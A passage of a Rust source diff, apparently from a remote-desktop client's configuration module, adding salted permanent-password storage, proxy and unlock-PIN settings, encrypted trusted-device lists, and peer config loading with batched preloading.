+    pub fn is_disable_change_permanent_password() -> bool {
+        BUILTIN_SETTINGS
+            .read()
+            .unwrap()
+            .get(keys::OPTION_DISABLE_CHANGE_PERMANENT_PASSWORD)
+            .map(|v| v == "Y")
+            .unwrap_or(false)
+    }
+
+    pub fn is_disable_change_id() -> bool {
+        BUILTIN_SETTINGS
+            .read()
+            .unwrap()
+            .get(keys::OPTION_DISABLE_CHANGE_ID)
+            .map(|v| v == "Y")
+            .unwrap_or(false)
+    }
+
+    pub fn is_disable_unlock_pin() -> bool {
+        BUILTIN_SETTINGS
+            .read()
+            .unwrap()
+            .get(keys::OPTION_DISABLE_UNLOCK_PIN)
+            .map(|v| v == "Y")
+            .unwrap_or(false)
+    }
+
+    pub fn get_id() -> String {
+        let mut id = CONFIG.read().unwrap().id.clone();
+        if id.is_empty() {
+            if let Some(tmp) = Config::gen_id() {
+                id = tmp;
+                Config::set_id(&id);
+            }
+        }
+        id
+    }
+
+    pub fn get_id_or(b: String) -> String {
+        let a = CONFIG.read().unwrap().id.clone();
+        if a.is_empty() {
+            b
+        } else {
+            a
+        }
+    }
+
+    pub fn get_options() -> HashMap<String, String> {
+        let mut res = DEFAULT_SETTINGS.read().unwrap().clone();
+        res.extend(CONFIG2.read().unwrap().options.clone());
+        res.extend(OVERWRITE_SETTINGS.read().unwrap().clone());
+        res
+    }
+
+    #[inline]
+    fn purify_options(v: &mut HashMap<String, String>) {
+        v.retain(|k, v| is_option_can_save(&OVERWRITE_SETTINGS, k, &DEFAULT_SETTINGS, v));
+    }
+
+    pub fn set_options(mut v: HashMap<String, String>) {
+        Self::purify_options(&mut v);
+        let mut config = CONFIG2.write().unwrap();
+        if config.options == v {
+            return;
+        }
+        config.options = v;
+        config.store();
+    }
+
+    pub fn get_option(k: &str) -> String {
+        get_or(
+            &OVERWRITE_SETTINGS,
+            &CONFIG2.read().unwrap().options,
+            &DEFAULT_SETTINGS,
+            k,
+        )
+        .unwrap_or_default()
+    }
+
+    pub fn get_bool_option(k: &str) -> bool {
+        option2bool(k, &Self::get_option(k))
+    }
+
+    pub fn set_option(k: String, v: String) {
+        if !is_option_can_save(&OVERWRITE_SETTINGS, &k, &DEFAULT_SETTINGS, &v) {
+            let mut config = CONFIG2.write().unwrap();
+            if config.options.remove(&k).is_some() {
+                config.store();
+            }
+            return;
+        }
+        let mut config = CONFIG2.write().unwrap();
+        let v2 = if v.is_empty() { None } else { Some(&v) };
+        if v2 != config.options.get(&k) {
+            if v2.is_none() {
+                config.options.remove(&k);
+            } else {
+                config.options.insert(k, v);
+            }
+            config.store();
+        }
+    }
+
+    pub fn update_id() {
+        // to-do: how about if one ip register a lot of ids?
+        let id = Self::get_id();
+        let mut rng = rand::thread_rng();
+        let new_id = rng.gen_range(1_000_000_000..2_000_000_000).to_string();
+        Config::set_id(&new_id);
+        log::info!("id updated from {} to {}", id, new_id);
+    }
+
+    pub fn set_permanent_password(password: &str) {
+        if Self::is_disable_change_permanent_password() {
+            return;
+        }
+        if HARD_SETTINGS
+            .read()
+            .unwrap()
+            .get("password")
+            .map_or(false, |v| v == password)
+        {
+            if CONFIG.read().unwrap().password.is_empty() {
+                return;
+            }
+        }
+
+        let mut config = CONFIG.write().unwrap();
+
+        let stored = if password.is_empty() {
+            String::new()
+        } else {
+            Self::compute_permanent_password_storage_for_update(&mut config, password)
+        };
+        if stored == config.password {
+            return;
+        }
+        config.password = stored;
+        config.store();
+        Self::clear_trusted_devices();
+    }
+
+    fn compute_permanent_password_storage_for_update(
+        config: &mut Config,
+        password: &str,
+    ) -> String {
+        // Keep salt stable for user-initiated permanent password updates.
+        // Salt should only change when service->user sync updates storage and salt as a pair.
+        if config.salt.is_empty() {
+            config.salt = Config::get_auto_password(DEFAULT_SALT_LEN);
+        }
+        let h1 = compute_permanent_password_h1(password, &config.salt);
+        encode_permanent_password_storage_from_h1(&h1)
+    }
+
+    /// Returns the locally persisted permanent password storage and salt (NOT the hard/preset one).
+    ///
+    /// This function is side-effect free:
+    /// - It does NOT call `get_salt()` (which may auto-generate salt).
+    /// - It returns a consistent snapshot under a single lock.
+    pub fn get_local_permanent_password_storage_and_salt() -> (String, String) {
+        let config = CONFIG.read().unwrap();
+        (config.password.clone(), config.salt.clone())
+    }
+
+    /// Persist permanent password storage and salt from service->user config sync.
+    pub fn set_permanent_password_storage_for_sync(
+        storage: &str,
+        salt: &str,
+    ) -> crate::ResultType<bool> {
+        let mut config = CONFIG.write().unwrap();
+        if config.password == storage && config.salt == salt {
+            return Ok(false);
+        }
+
+        config.password = storage.to_owned();
+        config.salt = salt.to_owned();
+        config.store();
+        Self::clear_trusted_devices();
+        Ok(true)
+    }
+
+    /// Returns true if `input` (candidate plaintext) matches the currently effective permanent password.
+    pub fn matches_permanent_password_plain(input: &str) -> bool {
+        if input.is_empty() {
+            return false;
+        }
+
+        let config = CONFIG.read().unwrap();
+        let storage = config.password.clone();
+        let salt = config.salt.clone();
+        drop(config);
+
+        if storage.is_empty() {
+            return HARD_SETTINGS
+                .read()
+                .unwrap()
+                .get("password")
+                .map_or(false, |v| v == input);
+        }
+
+        if let Some(stored_h1) = decode_permanent_password_h1_from_storage(&storage) {
+            if salt.is_empty() {
+                log::error!("Salt is empty but permanent password is hashed");
+                return false;
+            }
+            let h1 = compute_permanent_password_h1(input, &salt);
+            return constant_time_eq_32(&h1, &stored_h1);
+        }
+
+        log::warn!("Permanent password storage is not hashed; verifying as plaintext");
+        storage == input
+    }
+
+    pub fn has_permanent_password() -> bool {
+        if !CONFIG.read().unwrap().password.is_empty() {
+            return true;
+        }
+        HARD_SETTINGS
+            .read()
+            .unwrap()
+            .get("password")
+            .map_or(false, |v| !v.is_empty())
+    }
+
+    pub fn has_local_permanent_password() -> bool {
+        !CONFIG.read().unwrap().password.is_empty()
+    }
+
+    // This shouldn't happen under normal circumstances because the salt
+    // should be automatically generated when migrating to hash storage.
+    // Actually, it is better to avoid calling set_salt at all.
+    pub fn set_salt(salt: &str) {
+        let mut config = CONFIG.write().unwrap();
+        if salt == config.salt {
+            return;
+        }
+        if !password_is_empty_or_not_hashed(&config.password) {
+            if config.salt.is_empty() {
+                log::warn!("Salt is empty but permanent password is hashed and salt is empty");
+            } else {
+                log::error!("Refusing to set salt because permanent password is hashed");
+                return;
+            }
+        }
+        config.salt = salt.into();
+        config.store();
+    }
+
+    pub fn get_salt() -> String {
+        let config = CONFIG.read().unwrap();
+        let mut salt = config.salt.clone();
+        if salt.is_empty() {
+            drop(config);
+            salt = Config::get_auto_password(DEFAULT_SALT_LEN);
+            Config::set_salt(&salt);
+        }
+        salt
+    }
+
+    pub fn set_socks(socks: Option<Socks5Server>) {
+        if OVERWRITE_SETTINGS
+            .read()
+            .unwrap()
+            .contains_key(keys::OPTION_PROXY_URL)
+        {
+            return;
+        }
+
+        let mut config = CONFIG2.write().unwrap();
+        if config.socks == socks {
+            return;
+        }
+        if config.socks.is_none() {
+            let equal_to_default = |key: &str, value: &str| {
+                DEFAULT_SETTINGS
+                    .read()
+                    .unwrap()
+                    .get(key)
+                    .map_or(false, |x| *x == value)
+            };
+            let contains_url = DEFAULT_SETTINGS
+                .read()
+                .unwrap()
+                .get(keys::OPTION_PROXY_URL)
+                .is_some();
+            let url = equal_to_default(
+                keys::OPTION_PROXY_URL,
+                &socks.clone().unwrap_or_default().proxy,
+            );
+            let username = equal_to_default(
+                keys::OPTION_PROXY_USERNAME,
+                &socks.clone().unwrap_or_default().username,
+            );
+            let password = equal_to_default(
+                keys::OPTION_PROXY_PASSWORD,
+                &socks.clone().unwrap_or_default().password,
+            );
+            if contains_url && url && username && password {
+                return;
+            }
+        }
+        config.socks = socks;
+        config.store();
+    }
+
+    #[inline]
+    fn get_socks_from_custom_client_advanced_settings(
+        settings: &HashMap<String, String>,
+    ) -> Option<Socks5Server> {
+        let url = settings.get(keys::OPTION_PROXY_URL)?;
+        Some(Socks5Server {
+            proxy: url.to_owned(),
+            username: settings
+                .get(keys::OPTION_PROXY_USERNAME)
+                .map(|x| x.to_string())
+                .unwrap_or_default(),
+            password: settings
+                .get(keys::OPTION_PROXY_PASSWORD)
+                .map(|x| x.to_string())
+                .unwrap_or_default(),
+        })
+    }
+
+    pub fn get_socks() -> Option<Socks5Server> {
+        Self::get_socks_from_custom_client_advanced_settings(&OVERWRITE_SETTINGS.read().unwrap())
+            .or(CONFIG2.read().unwrap().socks.clone())
+            .or(Self::get_socks_from_custom_client_advanced_settings(
+                &DEFAULT_SETTINGS.read().unwrap(),
+            ))
+    }
+
+    #[inline]
+    pub fn is_proxy() -> bool {
+        Self::get_network_type() != NetworkType::Direct
+    }
+
+    pub fn get_network_type() -> NetworkType {
+        if OVERWRITE_SETTINGS
+            .read()
+            .unwrap()
+            .get(keys::OPTION_PROXY_URL)
+            .is_some()
+        {
+            return NetworkType::ProxySocks;
+        }
+        if CONFIG2.read().unwrap().socks.is_some() {
+            return NetworkType::ProxySocks;
+        }
+        if DEFAULT_SETTINGS
+            .read()
+            .unwrap()
+            .get(keys::OPTION_PROXY_URL)
+            .is_some()
+        {
+            return NetworkType::ProxySocks;
+        }
+        NetworkType::Direct
+    }
+
+    pub fn get_unlock_pin() -> String {
+        if Self::is_disable_unlock_pin() {
+            return String::new();
+        }
+        CONFIG2.read().unwrap().unlock_pin.clone()
+    }
+
+    pub fn set_unlock_pin(pin: &str) {
+        if Self::is_disable_unlock_pin() {
+            return;
+        }
+        let mut config = CONFIG2.write().unwrap();
+        if pin == config.unlock_pin {
+            return;
+        }
+        config.unlock_pin = pin.to_string();
+        config.store();
+    }
+
+    pub fn get_trusted_devices_json() -> String {
+        serde_json::to_string(&Self::get_trusted_devices()).unwrap_or_default()
+    }
+
+    pub fn get_trusted_devices() -> Vec<TrustedDevice> {
+        let (devices, synced) = TRUSTED_DEVICES.read().unwrap().clone();
+        if synced {
+            return devices;
+        }
+        let devices = CONFIG2.read().unwrap().trusted_devices.clone();
+        let (devices, succ, store) = decrypt_str_or_original(&devices, PASSWORD_ENC_VERSION);
+        if succ {
+            let mut devices: Vec<TrustedDevice> =
+                serde_json::from_str(&devices).unwrap_or_default();
+            let len = devices.len();
+            devices.retain(|d| !d.outdate());
+            if store || devices.len() != len {
+                Self::set_trusted_devices(devices.clone());
+            }
+            *TRUSTED_DEVICES.write().unwrap() = (devices.clone(), true);
+            devices
+        } else {
+            Default::default()
+        }
+    }
+
+    fn set_trusted_devices(mut trusted_devices: Vec<TrustedDevice>) {
+        trusted_devices.retain(|d| !d.outdate());
+        let devices = serde_json::to_string(&trusted_devices).unwrap_or_default();
+        let max_len = 1024 * 1024;
+        if devices.bytes().len() > max_len {
+            log::error!("Trusted devices too large: {}", devices.bytes().len());
+            return;
+        }
+        let devices = encrypt_str_or_original(&devices, PASSWORD_ENC_VERSION, max_len);
+        let mut config = CONFIG2.write().unwrap();
+        config.trusted_devices = devices;
+        config.store();
+        *TRUSTED_DEVICES.write().unwrap() = (trusted_devices, true);
+    }
+
+    pub fn add_trusted_device(device: TrustedDevice) {
+        let mut devices = Self::get_trusted_devices();
+        devices.retain(|d| d.hwid != device.hwid);
+        devices.push(device);
+        Self::set_trusted_devices(devices);
+    }
+
+    pub fn remove_trusted_devices(hwids: &Vec<Bytes>) {
+        let mut devices = Self::get_trusted_devices();
+        devices.retain(|d| !hwids.contains(&d.hwid));
+        Self::set_trusted_devices(devices);
+    }
+
+    pub fn clear_trusted_devices() {
+        Self::set_trusted_devices(Default::default());
+    }
+
+    pub fn get() -> Config {
+        return CONFIG.read().unwrap().clone();
+    }
+
+    // TODO: `Config::set()` does not invalidate trusted devices when permanent password/salt changes.
+    // This matches historical behavior, but may need revisiting in a separate PR.
+    pub fn set(cfg: Config) -> bool {
+        let mut lock = CONFIG.write().unwrap();
+        if *lock == cfg {
+            return false;
+        }
+        *lock = cfg;
+        lock.store();
+        // Drop CONFIG lock before acquiring KEY_PAIR lock to avoid potential deadlock.
+        #[cfg(target_os = "macos")]
+        let new_key_pair = lock.key_pair.clone();
+        drop(lock);
+        #[cfg(target_os = "macos")]
+        Self::invalidate_key_pair_cache_if_changed(&new_key_pair);
+        true
+    }
+
+    /// Invalidate KEY_PAIR cache if it differs from the new key_pair.
+    /// Use None to invalidate the cache instead of Some(key_pair).
+    /// If we use Some with an empty key_pair, get_key_pair() would always return
+    /// the empty key_pair from cache without regenerating.
+    /// By clearing the cache, get_key_pair() will reload and regenerate if needed.
+    #[cfg(target_os = "macos")]
+    fn invalidate_key_pair_cache_if_changed(new_key_pair: &KeyPair) {
+        let mut key_pair_cache = KEY_PAIR.lock().unwrap();
+        if let Some(cached) = key_pair_cache.as_ref() {
+            if cached != new_key_pair {
+                *key_pair_cache = None;
+                log::info!("key pair cache invalidated");
+            }
+        }
+    }
+
+    fn with_extension(path: PathBuf) -> PathBuf {
+        let ext = path.extension();
+        if let Some(ext) = ext {
+            let ext = format!("{}.toml", ext.to_string_lossy());
+            path.with_extension(ext)
+        } else {
+            path.with_extension("toml")
+        }
+    }
+}
+
+const PEERS: &str = "peers";
+
+impl PeerConfig {
+    pub fn load(id: &str) -> PeerConfig {
+        let _lock = CONFIG.read().unwrap();
+        match confy::load_path(Self::path(id)) {
+            Ok(config) => {
+                let mut config: PeerConfig = config;
+                let mut store = false;
+                let (password, _, store2) =
+                    decrypt_vec_or_original(&config.password, PASSWORD_ENC_VERSION);
+                config.password = password;
+                store = store || store2;
+                for opt in ["rdp_password", "os-username", "os-password"] {
+                    if let Some(v) = config.options.get_mut(opt) {
+                        let (encrypted, _, store2) =
+                            decrypt_str_or_original(v, PASSWORD_ENC_VERSION);
+                        *v = encrypted;
+                        store = store || store2;
+                    }
+                }
+                if store {
+                    config.store_(id);
+                }
+                config
+            }
+            Err(err) => {
+                if let confy::ConfyError::GeneralLoadError(err) = &err {
+                    if err.kind() == std::io::ErrorKind::NotFound {
+                        return Default::default();
+                    }
+                }
+                log::error!("Failed to load peer config '{}': {}", id, err);
+                Default::default()
+            }
+        }
+    }
+
+    pub fn store(&self, id: &str) {
+        let _lock = CONFIG.read().unwrap();
+        self.store_(id);
+    }
+
+    fn store_(&self, id: &str) {
+        let mut config = self.clone();
+        config.password =
+            encrypt_vec_or_original(&config.password, PASSWORD_ENC_VERSION, ENCRYPT_MAX_LEN);
+        for opt in ["rdp_password", "os-username", "os-password"] {
+            if let Some(v) = config.options.get_mut(opt) {
+                *v = encrypt_str_or_original(v, PASSWORD_ENC_VERSION, ENCRYPT_MAX_LEN)
+            }
+        }
+        if let Err(err) = store_path(Self::path(id), config) {
+            log::error!("Failed to store config: {}", err);
+        }
+        NEW_STORED_PEER_CONFIG.lock().unwrap().insert(id.to_owned());
+    }
+
+    pub fn remove(id: &str) {
+        fs::remove_file(Self::path(id)).ok();
+    }
+
+    fn path(id: &str) -> PathBuf {
+        //If the id contains invalid chars, encode it
+        let forbidden_paths = Regex::new(r".*[<>:/\\|\?\*].*");
+        let path: PathBuf;
+        if let Ok(forbidden_paths) = forbidden_paths {
+            let id_encoded = if forbidden_paths.is_match(id) {
+                "base64_".to_string() + base64::encode(id, base64::Variant::Original).as_str()
+            } else {
+                id.to_string()
+            };
+            path = [PEERS, id_encoded.as_str()].iter().collect();
+        } else {
+            log::warn!("Regex create failed: {:?}", forbidden_paths.err());
+            // fallback for failing to create this regex.
+            path = [PEERS, id.replace(":", "_").as_str()].iter().collect();
+        }
+        Config::with_extension(Config::path(path))
+    }
+
+    // The number of peers to load in the first round when showing the peers card list in the main window.
+    // When there're too many peers, loading all of them at once will take a long time.
+    // We can load them in two rouds, the first round loads the first 100 peers, and the second round loads the rest.
+    // Then the UI will show the first 100 peers first, and the rest will be loaded and shown later.
+    pub const BATCH_LOADING_COUNT: usize = 100;
+
+    pub fn get_vec_id_modified_time_path(
+        id_filters: &Option<Vec<String>>,
+    ) -> Vec<(String, SystemTime, PathBuf)> {
+        if let Ok(peers) = Config::path(PEERS).read_dir() {
+            let mut vec_id_modified_time_path = peers
+                .into_iter()
+                .filter_map(|res| match res {
+                    Ok(res) => {
+                        let p = res.path();
+                        if p.is_file()
+                            && p.extension().map(|p| p.to_str().unwrap_or("")) == Some("toml")
+                        {
+                            Some(p)
+                        } else {
+                            None
+                        }
+                    }
+                    _ => None,
+                })
+                .map(|p| {
+                    let id = p
+                        .file_stem()
+                        .map(|p| p.to_str().unwrap_or(""))
+                        .unwrap_or("")
+                        .to_owned();
+
+                    let id_decoded_string = if id.starts_with("base64_") && id.len() != 7 {
+                        let id_decoded =
+                            base64::decode(&id[7..], base64::Variant::Original).unwrap_or_default();
+                        String::from_utf8_lossy(&id_decoded).as_ref().to_owned()
+                    } else {
+                        id
+                    };
+                    (id_decoded_string, p)
+                })
+                .filter(|(id, _)| {
+                    let Some(filters) = id_filters else {
+                        return true;
+                    };
+                    filters.contains(id)
+                })
+                .map(|(id, p)| {
+                    let t = crate::get_modified_time(&p);
+                    (id, t, p)
+                })
+                .collect::<Vec<_>>();
+            vec_id_modified_time_path.sort_unstable_by(|a, b| b.1.cmp(&a.1));
+            vec_id_modified_time_path
+        } else {
+            vec![]
+        }
+    }
+
+    #[inline]
+    async fn preload_file_async(path: PathBuf) {
+        let _ = tokio::fs::File::open(path).await;
+    }
+
+    #[tokio::main(flavor = "current_thread")]
+    async fn preload_peers_async() {
+        let now = std::time::Instant::now();
+        let vec_id_modified_time_path = Self::get_vec_id_modified_time_path(&None);
+        let total_count = vec_id_modified_time_path.len();
+        let mut futs = vec![];
+        for (_, _, path) in vec_id_modified_time_path.into_iter() {
+            futs.push(Self::preload_file_async(path));
+            if futs.len() >= Self::BATCH_LOADING_COUNT {
+                let first_load_start = std::time::Instant::now();
+                futures::future::join_all(futs).await;
+                if first_load_start.elapsed().as_millis() < 10 {
+                    // No need to preload the rest if the first load is fast.
+                    return;
+                }
+                futs = vec![];
+            }
+        }
+        if !futs.is_empty() {
+            futures::future::join_all(futs).await;
+        }
+        log::info!(
+            "Preload peers done in {:?}, batch_count: {}, total: {}",
+            now.elapsed(),
+            Self::BATCH_LOADING_COUNT,
+            total_count
+        );
+    }
+
+    // We have to preload all peers in a background thread.
+    // Because we find that opening files the first time after the system (Windows) booting will be very slow, up to 200~400ms.
+    // The reason is that the Windows has "Microsoft Defender Antivirus Service" running in the background, which will scan the file when it's opened the first time.
+    // So we have to preload all peers in a background thread to avoid the delay when opening the file the first time.
+    // We can temporarily stop "Microsoft Defender Antivirus Service" or add the fold to the white list, to verify this. But don't do this in the release version.
+    pub fn preload_peers() {
+        std::thread::spawn(|| {
+            Self::preload_peers_async();
+        });
+    }
+
+    pub fn peers(id_filters: Option<Vec<String>>) -> Vec<(String, SystemTime, PeerConfig)> {
+        let vec_id_modified_time_path = Self::get_vec_id_modified_time_path(&id_filters);
+        Self::batch_peers(
+            &vec_id_modified_time_path,
+            0,
+            Some(vec_id_modified_time_path.len()),
+        )
+        .0
+    }
+
+    pub fn batch_peers(
+        all: &Vec<(String, SystemTime, PathBuf)>,
+        from: usize,
+        to: Option<usize>,
+    ) -> (Vec<(String, SystemTime, PeerConfig)>, usize) {
+        if from >= all.len() {
+            return (vec![], 0);
+        }
+
+        let to = match to {
+            Some(to) => to.min(all.len()),
+            None => (from + Self::BATCH_LOADING_COUNT).min(all.len()),
+        };
+
+        // to <= from is unexpected, but we can just return an empty vec in this case.
+        if to <= from {
+            return (vec![], from);
+        }
+
+        let peers: Vec<_> = all[from..to]
+            .iter()
+            .map(|(id, t, p)| {
+                let c = PeerConfig::load(&id);
+                if c.info.platform.is_empty() {
+                    fs::remove_file(p).ok();
+                }
+                (id.clone(), t.clone(), c)
+            })
+            .filter(|p| !p.2.info.platform.is_empty())
+            .collect();
+        (peers, to)
+    }
+
+    pub fn exists(id: &str) -> bool {
+        Self::path(id).exists()
+    }
+
+    serde_field_string!(
+        default_view_style,
+        deserialize_view_style,
+        UserDefaultConfig::read(keys::OPTION_VIEW_STYLE)
+    );
+    serde_field_string!(
+        default_scroll_style,
+        deserialize_scroll_style,
+        UserDefaultConfig::read(keys::OPTION_SCROLL_STYLE)
+    );
+    serde_field_string!(
+        default_image_quality,
+        deserialize_image_quality,
+        UserDefaultConfig::read(keys::OPTION_IMAGE_QUALITY)
+    );
+    serde_field_string!(
+        default_reverse_mouse_wheel,
+        deserialize_reverse_mouse_wheel,
+        UserDefaultConfig::read(keys::OPTION_REVERSE_MOUSE_WHEEL)
+    );
+    serde_field_string!(
+        default_displays_as_individual_windows,
+        deserialize_displays_as_individual_windows,
+        UserDefaultConfig::read(keys::OPTION_DISPLAYS_AS_INDIVIDUAL_WINDOWS)
+    );
+    serde_field_string!(
+        default_use_all_my_displays_for_the_remote_session,
+        deserialize_use_all_my_displays_for_the_remote_session,
+        UserDefaultConfig::read(keys::OPTION_USE_ALL_MY_DISPLAYS_FOR_THE_REMOTE_SESSION)
+    );
+
+    fn default_custom_image_quality() -> Vec<i32> {
+        let f: f64 = UserDefaultConfig::read(keys::OPTION_CUSTOM_IMAGE_QUALITY)
+            .parse()
+            .unwrap_or(50.0);
+        vec![f as _]
+    }
+
+    fn deserialize_custom_image_quality<'de, D>(deserializer: D) -> Result<Vec<i32>, D::Error>
+    where
+        D: de::Deserializer<'de>,
+    {
+        let v: Vec<i32> = de::Deserialize::deserialize(deserializer)?;
+        if v.len() == 1 && v[0] >= 10 && v[0] <= 0xFFF {
+            Ok(v)
+        } else {
+            Ok(Self::default_custom_image_quality())
+        }
+    }
+
+    fn default_options() -> HashMap<String, String> {
+        let mut mp: HashMap<String, String> = Default::default();
+        let _ = [
+            keys::OPTION_CODEC_PREFERENCE,
+            keys::OPTION_CUSTOM_FPS,
+            keys::OPTION_ZOOM_CURSOR,
+            keys::OPTION_I444,
+            keys::OPTION_SWAP_LEFT_RIGHT_MOUSE,
+            keys::OPTION_COLLAPSE_TOOLBAR,
+        ]
+        .map(|key| {
+            mp.insert(key.to_owned(), UserDefaultConfig::read(key));
+        });
+        mp
+    }
+
+    fn default_trackpad_speed() -> i32 {
+        UserDefaultConfig::read(keys::OPTION_TRACKPAD_SPEED)
+            .parse()
+            .unwrap_or(100)
+    }
+
+    fn deserialize_trackpad_speed<'de, D>(deserializer: D) -> Result<i32, D::Error>
+    where
+        D: de::Deserializer<'de>,
+    {
+        let v: i32 = de::Deserialize::deserialize(deserializer)?;
+        if v >= 10 && v <= 1000 {
+            Ok(v)
+        } else {
+            Ok(Self::default_trackpad_speed())
+        }
+    }
+
+    fn default_edge_scroll_edge_thickness() -> i32 {
+        UserDefaultConfig::read(keys::OPTION_EDGE_SCROLL_EDGE_THICKNESS)
+            .parse()
+            .unwrap_or(100)
+    }
+
+    fn deserialize_edge_scroll_edge_thickness<'de, D>(deserializer: D) -> Result<i32, D::Error>
+    where
+        D: de::Deserializer<'de>,
+    {
+        let v: i32 = de::Deserialize::deserialize(deserializer)?;
+        if v >= 20 && v <= 150 {
+            Ok(v)
+        } else {
+            Ok(Self::default_edge_scroll_edge_thickness())
+        }
+    }
+}
+
+serde_field_bool!(
+    ShowRemoteCursor,
+    "show_remote_cursor",
+    default_show_remote_cursor,
+    "ShowRemoteCursor::default_show_remote_cursor"
+);
+serde_field_bool!(
+    FollowRemoteCursor,
+    "follow_remote_cursor",
+    default_follow_remote_cursor,
+    "FollowRemoteCursor::default_follow_remote_cursor"
+);
+
+serde_field_bool!(
+    FollowRemoteWindow,
+    "follow_remote_window",
+    default_follow_remote_window,
+    "FollowRemoteWindow::default_follow_remote_window"
+);
+serde_field_bool!(
+    ShowQualityMonitor,
+    "show_quality_monitor",
+    default_show_quality_monitor,
+    "ShowQualityMonitor::default_show_quality_monitor"
+);
+serde_field_bool!(
+    DisableAudio,
+    "disable_audio",
+    default_disable_audio,
+    "DisableAudio::default_disable_audio"
+);
+serde_field_bool!(
+    EnableFileCopyPaste,
+    "enable-file-copy-paste",
+    default_enable_file_copy_paste,
+    "EnableFileCopyPaste::default_enable_file_copy_paste"
+);
+serde_field_bool!(
+    DisableClipboard,
+    "disable_clipboard",
+    default_disable_clipboard,
+    "DisableClipboard::default_disable_clipboard"
+);
+serde_field_bool!(
+    LockAfterSessionEnd,
+    "lock_after_session_end",
+    default_lock_after_session_end,
+    "LockAfterSessionEnd::default_lock_after_session_end"
+);
+serde_field_bool!(
+    TerminalPersistent,
+    "terminal-persistent",
+    default_terminal_persistent,
+    "TerminalPersistent::default_terminal_persistent"
+);
+serde_field_bool!(
+    PrivacyMode,
+    "privacy_mode",
+    default_privacy_mode,
+    "PrivacyMode::default_privacy_mode"
+);
+
+serde_field_bool!(
+    AllowSwapKey,
+    "allow_swap_key",
+    default_allow_swap_key,
+    "AllowSwapKey::default_allow_swap_key"
+);
+
+serde_field_bool!(
+    ViewOnly,
+    "view_only",
+    default_view_only,
+    "ViewOnly::default_view_only"
+);
+
+serde_field_bool!(
+    ShowMyCursor,
+    "show_my_cursor",
+    default_show_my_cursor,
+    "ShowMyCursor::default_show_my_cursor"
+);
+
+serde_field_bool!(
+    SyncInitClipboard,
+    "sync-init-clipboard",
+    default_sync_init_clipboard,
+    "SyncInitClipboard::default_sync_init_clipboard"
+);
+
+#[derive(Debug, Default, Serialize, Deserialize, Clone)]
+pub struct LocalConfig {
+    #[serde(default, deserialize_with = "deserialize_string")]
+    remote_id: String, // latest used one
+    #[serde(default, deserialize_with = "deserialize_string")]
+    kb_layout_type: String,
+    #[serde(default, deserialize_with = "deserialize_size")]
+    size: Size,
+    #[serde(default, deserialize_with = "deserialize_vec_string")]
+    pub fav: Vec<String>,
+    #[serde(default, deserialize_with = "deserialize_hashmap_string_string")]
+    options: HashMap<String, String>,
+    // Various data for flutter ui
+    #[serde(default, deserialize_with = "deserialize_hashmap_string_string")]
+    ui_flutter: HashMap<String, String>,
+}
+
+impl LocalConfig {
+    fn load() -> LocalConfig {
+        Config::load_::<LocalConfig>("_local")
+    }
+
+    fn store(&self) {
+        Config::store_(self, "_local");
+    }
+
+    pub fn get_kb_layout_type() -> String {
+        LOCAL_CONFIG.read().unwrap().kb_layout_type.clone()
+    }
+
+    pub fn set_kb_layout_type(kb_layout_type: String) {
+        let mut config = LOCAL_CONFIG.write().unwrap();
+        config.kb_layout_type = kb_layout_type;
+        config.store();
+    }
+
+    pub fn get_size() -> Size {
+        LOCAL_CONFIG.read().unwrap().size
+    }
+
+    pub fn set_size(x: i32, y: i32, w: i32, h: i32) {
+        let mut config = LOCAL_CONFIG.write().unwrap();
+        let size = (x, y, w, h);
+        if size == config.size || size.2 < 300 || size.3 < 300 {
+            return;
+        }
+        config.size = size;
+        config.store();
+    }
+
+    pub fn set_remote_id(remote_id: &str) {
+        let mut config = LOCAL_CONFIG.write().unwrap();
+        if remote_id == config.remote_id {
+            return;
+        }
+        config.remote_id = remote_id.into();
+        config.store();
+    }
+
+    pub fn get_remote_id() -> String {
+        LOCAL_CONFIG.read().unwrap().remote_id.clone()
+    }
+
+    pub fn set_fav(fav: Vec<String>) {
+        let mut lock = LOCAL_CONFIG.write().unwrap();
+        if lock.fav == fav {
+            return;
+        }
+        lock.fav = fav;
+        lock.store();
+    }
+
+    pub fn get_fav() -> Vec<String> {
+        LOCAL_CONFIG.read().unwrap().fav.clone()
+    }
+
+    pub fn get_option(k: &str) -> String {
+        get_or(
+            &OVERWRITE_LOCAL_SETTINGS,
+            &LOCAL_CONFIG.read().unwrap().options,
+            &DEFAULT_LOCAL_SETTINGS,
+            k,
+        )
+        .unwrap_or_default()
+    }
+
+    // Usually get_option should be used.
+    pub fn get_option_from_file(k: &str) -> String {
+        get_or(
+            &OVERWRITE_LOCAL_SETTINGS,
+            &Self::load().options,
+            &DEFAULT_LOCAL_SETTINGS,
+            k,
+        )
+        .unwrap_or_default()
+    }
+
+    pub fn get_bool_option(k: &str) -> bool {
+        option2bool(k, &Self::get_option(k))
+    }
+
+    pub fn set_option(k: String, v: String) {
+        if !is_option_can_save(&OVERWRITE_LOCAL_SETTINGS, &k, &DEFAULT_LOCAL_SETTINGS, &v) {
+            let mut config = LOCAL_CONFIG.write().unwrap();
+            if config.options.remove(&k).is_some() {
+                config.store();
+            }
+            return;
+        }
+        let mut config = LOCAL_CONFIG.write().unwrap();
+        // The custom client will explictly set "default" as the default language.
+        let is_custom_client_default_lang = k == keys::OPTION_LANGUAGE && v == "default";
+        if is_custom_client_default_lang {
+            config.options.insert(k, "".to_owned());
+            config.store();
+            return;
+        }
+        let v2 = if v.is_empty() { None } else { Some(&v) };
+        if v2 != config.options.get(&k) {
+            if v2.is_none() {
+                config.options.remove(&k);
+            } else {
+                config.options.insert(k, v);
+            }
+            config.store();
+        }
+    }
+
+    pub fn get_flutter_option(k: &str) -> String {
+        get_or(
+            &OVERWRITE_LOCAL_SETTINGS,
+            &LOCAL_CONFIG.read().unwrap().ui_flutter,
+            &DEFAULT_LOCAL_SETTINGS,
+            k,
+        )
+        .unwrap_or_default()
+    }
+
+    pub fn set_flutter_option(k: String, v: String) {
+        let mut config = LOCAL_CONFIG.write().unwrap();
+        let v2 = if v.is_empty() { None } else { Some(&v) };
+        if v2 != config.ui_flutter.get(&k) {
+            if v2.is_none() {
+                config.ui_flutter.remove(&k);
+            } else {
+                config.ui_flutter.insert(k, v);
+            }
+            config.store();
+        }
+    }
+}
+
+#[derive(Debug, Default, Serialize, Deserialize, Clone)]
+pub struct DiscoveryPeer {
+    #[serde(default, deserialize_with = "deserialize_string")]
+    pub id: String,
+    #[serde(default, deserialize_with = "deserialize_string")]
+    pub username: String,
+    #[serde(default, deserialize_with = "deserialize_string")]
+    pub hostname: String,
+    #[serde(default, deserialize_with = "deserialize_string")]
+    pub platform: String,
+    #[serde(default, deserialize_with = "deserialize_bool")]
+    pub online: bool,
